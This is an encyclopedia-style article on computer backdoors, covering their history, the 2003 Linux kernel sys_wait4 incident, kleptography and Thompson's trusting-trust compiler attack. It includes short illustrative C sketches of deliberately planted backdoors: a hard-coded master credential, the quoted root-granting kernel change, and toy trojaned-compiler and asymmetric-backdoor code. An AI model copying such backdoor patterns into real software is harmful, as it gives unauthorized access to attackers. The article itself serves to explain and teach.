Backdoor (computing)

A backdoor in a computer system (or cryptosystem or algorithm) is a method of bypassing normal authentication, securing remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected. The backdoor may take the form of an installed program (e.g., Back Orifice), or could be a modification to an existing program or hardware device.

Overview

The threat of backdoors surfaced when multiuser and networked operating systems became widely adopted. Petersen and Turn discussed computer subversion in a paper published in the proceedings of the 1967 AFIPS Conference.[1] They noted a class of active infiltration attacks that use "trapdoor" entry points into the system to bypass security facilities and permit direct access to data. The use of the word trapdoor here clearly coincides with more recent definitions of a backdoor. However, since the advent of public key cryptography the term trapdoor has acquired a different meaning. More generally, such security breaches were discussed at length in a RAND Corporation task force report published under ARPA sponsorship by J.P. Anderson and D.J. Edwards in 1970.[2]

A backdoor in a login system might take the form of a hard-coded username-and-password combination that gives access to the system. A famous example of this sort of backdoor served as a plot device in the 1983 film WarGames, in which the architect of the "WOPR" computer system had inserted a hardcoded password (his dead son's name) that gave access to the system and to undocumented parts of it (in particular, a video game-like simulation mode).
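
A minimal sketch of such a hard-coded credential check (the function names and the stub below are invented for illustration; the master credential echoes the film's plot):

    /* Illustrative sketch only: a login check with a hard-coded master
     * credential compiled into the binary. All names are invented. */
    #include <stdio.h>
    #include <string.h>

    /* stub standing in for the legitimate authentication path */
    static int lookup_and_verify(const char *user, const char *pass) {
        (void)user; (void)pass;
        return 0;
    }

    int check_password(const char *user, const char *pass) {
        /* backdoor: an undocumented credential that always succeeds */
        if (strcmp(user, "joshua") == 0 && strcmp(pass, "joshua") == 0)
            return 1;
        return lookup_and_verify(user, pass);  /* normal path */
    }

    int main(void) {
        printf("%d\n", check_password("joshua", "joshua"));  /* prints 1 */
        return 0;
    }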

An attempt to plant a backdoor in the Linux kernel, exposed in November 2003, showed how subtle such a code change can be.[3] In this case, a two-line change appeared to be a typographical error but actually gave the caller of the sys_wait4 function root access to the system.[4]
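
The inserted lines, as quoted in public reports of the incident, read like routine argument validation (reproduced here from those reports; surrounding kernel context omitted):

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
            retval = -EINVAL;

Because current->uid = 0 is an assignment rather than the comparison ==, its value is 0: retval is never set, and the only effect is that any caller passing the invalid flag combination __WCLONE|__WALL silently becomes root.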

Although claims of backdoors in systems using proprietary software (that is, software whose source code is not readily available for inspection) are not widely given credence, such backdoors are nevertheless exposed from time to time. Programmers have even succeeded in secretly installing large amounts of benign code as Easter eggs in programs, although such cases may involve official forbearance, if not actual permission.

It is also possible to create a backdoor without modifying a program's source code, or even its object code after compilation. This can be done by subverting the compiler so that it recognizes, during compilation, the piece of code that should trigger insertion of a backdoor in the compiled output. When the compromised compiler encounters such code, it compiles it as usual but also inserts a backdoor (perhaps a password-recognition routine). When a user later supplies that password, the backdoor grants access to some (likely undocumented) aspect of the program's operation. This attack was first outlined by Ken Thompson in his famous paper Reflections on Trusting Trust (see below).
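
A toy sketch of the idea (the "compiler" below just echoes lines, and every name and pattern is an invented stand-in; the real attack operates on generated machine code, not text):

    /* Toy trojaned compile step: a recognized login check triggers the
     * emission of extra code that appears in no source file. */
    #include <stdio.h>
    #include <string.h>

    static void emit(const char *code) { printf("%s\n", code); }

    static void compile_line(const char *line) {
        emit(line);  /* the source still compiles exactly as written... */
        if (strstr(line, "verify_password(")) {
            /* ...plus a hidden master-password check */
            emit("if (strcmp(pass, \"sesame\") == 0) authenticated = 1;");
        }
    }

    int main(void) {
        compile_line("authenticated = verify_password(user, pass);");
        return 0;
    }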

Many computer worms, such as Sobig and Mydoom, install a backdoor on the affected computer (generally a PC on broadband running insecure versions of Microsoft Windows and Microsoft Outlook). Such backdoors appear to be installed so that spammers can send junk e-mail from the infected machines. Others, such as the Sony BMG rootkit distributed silently on millions of music CDs through late 2005, are intended as DRM measures and, in that case, as data-gathering agents, since both surreptitious programs they installed routinely contacted central servers.

A traditional backdoor is a symmetric backdoor: anyone who finds it can in turn use it. The notion of an asymmetric backdoor was introduced by Adam Young and Moti Yung in the Proceedings of Advances in Cryptology: Crypto '96. An asymmetric backdoor can be used only by the attacker who plants it, even if the full implementation of the backdoor becomes public (e.g., via publication, or via discovery and disclosure through reverse engineering). It is also computationally intractable to detect the presence of an asymmetric backdoor under black-box queries. This class of attacks has been termed kleptography; such attacks can be carried out in software, in hardware (for example, smartcards), or in a combination of the two. The theory of asymmetric backdoors is part of a larger field now called cryptovirology.
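
A toy sketch of the asymmetric idea (every number and helper below is an invented, textbook-scale stand-in; real kleptographic constructions hide the ciphertext inside normal-looking key material rather than emitting it separately): the generator leaks the key-derivation seed encrypted under the attacker's public key, so even someone holding the generator's full source cannot use the backdoor without the attacker's private key.

    /* Toy asymmetric-backdoor sketch: illustration only, not real crypto. */
    #include <stdio.h>
    #include <stdint.h>

    /* attacker's textbook RSA key pair: n = 3233 (61*53), e = 17, d = 2753 */
    #define ATT_N 3233u
    #define ATT_E 17u
    #define ATT_D 2753u

    static uint32_t powmod(uint32_t b, uint32_t e, uint32_t m) {
        uint64_t r = 1, x = b % m;
        while (e) {
            if (e & 1) r = r * x % m;
            x = x * x % m;
            e >>= 1;
        }
        return (uint32_t)r;
    }

    /* derive the victim's "secret key" deterministically from a seed */
    static uint32_t key_from_seed(uint32_t seed) { return seed * 2654435761u; }

    /* backdoored generator: publishes a value derived from the secret key,
     * plus the seed encrypted under the attacker's PUBLIC key */
    static void generate(uint32_t seed, uint32_t *pub, uint32_t *hint) {
        *pub  = key_from_seed(seed) ^ 0xdeadbeefu; /* stand-in "public key" */
        *hint = powmod(seed, ATT_E, ATT_N);        /* readable only by the attacker */
    }

    int main(void) {
        uint32_t pub, hint;
        generate(1234, &pub, &hint);

        /* the code and output are fully public, yet recovering the seed
         * requires the attacker's private exponent d */
        uint32_t seed = powmod(hint, ATT_D, ATT_N);
        printf("recovered key matches: %s\n",
               key_from_seed(seed) == (pub ^ 0xdeadbeefu) ? "yes" : "no");
        return 0;
    }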

An experimental asymmetric backdoor in RSA key generation exists. This OpenSSL RSA backdoor, designed by Young and Yung, uses a twisted pair of elliptic curves and has been made publicly available.

Reflections on Trusting Trust

Ken Thompson's Reflections on Trusting Trust[5] was the first major paper to describe black-box backdoor issues, and it pointed out that trust is relative. It described a very clever backdoor mechanism that relies on the fact that people review only source (human-written) code, not compiled machine code. A program called a compiler is used to create the second from the first, and the compiler is usually trusted to do an honest job.

Thompson's paper described a modified version of the Unix C compiler that would:

  • Insert an invisible backdoor into the Unix login command whenever login was compiled, and, as a twist,
  • Add the same recognition-and-insertion mechanism, undetectably, to any future version of the compiler built from the compiler's own source (sketched below).
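
Extending the toy compiler sketch from the overview above (reusing its invented emit() helper; still an illustration, not Thompson's actual code), the self-propagating version carries a second pattern:

    /* Toy two-pattern version: pattern 1 backdoors login; pattern 2
     * re-inserts this recognition logic whenever the compiler compiles
     * its own, apparently clean, source. */
    static void compile_line(const char *line) {
        emit(line);  /* every line still compiles as written */
        if (strstr(line, "verify_password(")) {
            emit("if (strcmp(pass, \"sesame\") == 0) authenticated = 1;");
        } else if (strstr(line, "compile_line(")) {
            /* replay this whole function into the new compiler binary, so
             * a clean source tree still yields a trojaned compiler */
            emit("/* ...re-insertion of the recognition logic... */");
        }
    }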

Because the compiler itself was a compiled program, users would be extremely unlikely to notice the machine code instructions that performed these tasks. (Because of the second task, the compiler's source code would appear "clean".) Worse, in Thompson's proof-of-concept implementation, the subverted compiler also subverted the analysis program (the disassembler), so that anyone who examined the binaries in the usual way would not see the real code that was running, but something else instead. This version was never released into the wild; it was, however, given to a sibling Bell Labs organization as a test case, and the attack was never found.[citation needed]

In theory, once a system has been compromised with a backdoor or Trojan horse, such as the Trusting Trust compiler, there is no way for the "rightful" user to regain control of the system. However, several practical weaknesses in the Trusting Trust scheme have been suggested. (For example, a sufficiently motivated user could painstakingly review the machine code of the untrusted compiler before using it. As mentioned above, there are ways to counter this attack, such as subverting the disassembler; but there are ways to counter that defense, too, such as writing your own disassembler from scratch, so the infected compiler won't recognize it.)

References

  1. H. E. Petersen and R. Turn, "System Implications of Information Privacy", Proceedings of the AFIPS Spring Joint Computer Conference, vol. 30, pp. 291–300, AFIPS Press, 1967.
  2. W. H. Ware (ed.), Security Controls for Computer Systems, Technical Report R-609, RAND Corporation, February 1970.
  3. Linux kernel mailing list archive: "Re: BK2CVS problem".
  4. Kevin Poulsen, "Thwarted Linux backdoor hints at smarter hacks", SecurityFocus, 6 November 2003.
  5. Ken Thompson, "Reflections on Trusting Trust", Communications of the ACM, vol. 27, no. 8 (August 1984), pp. 761–763.
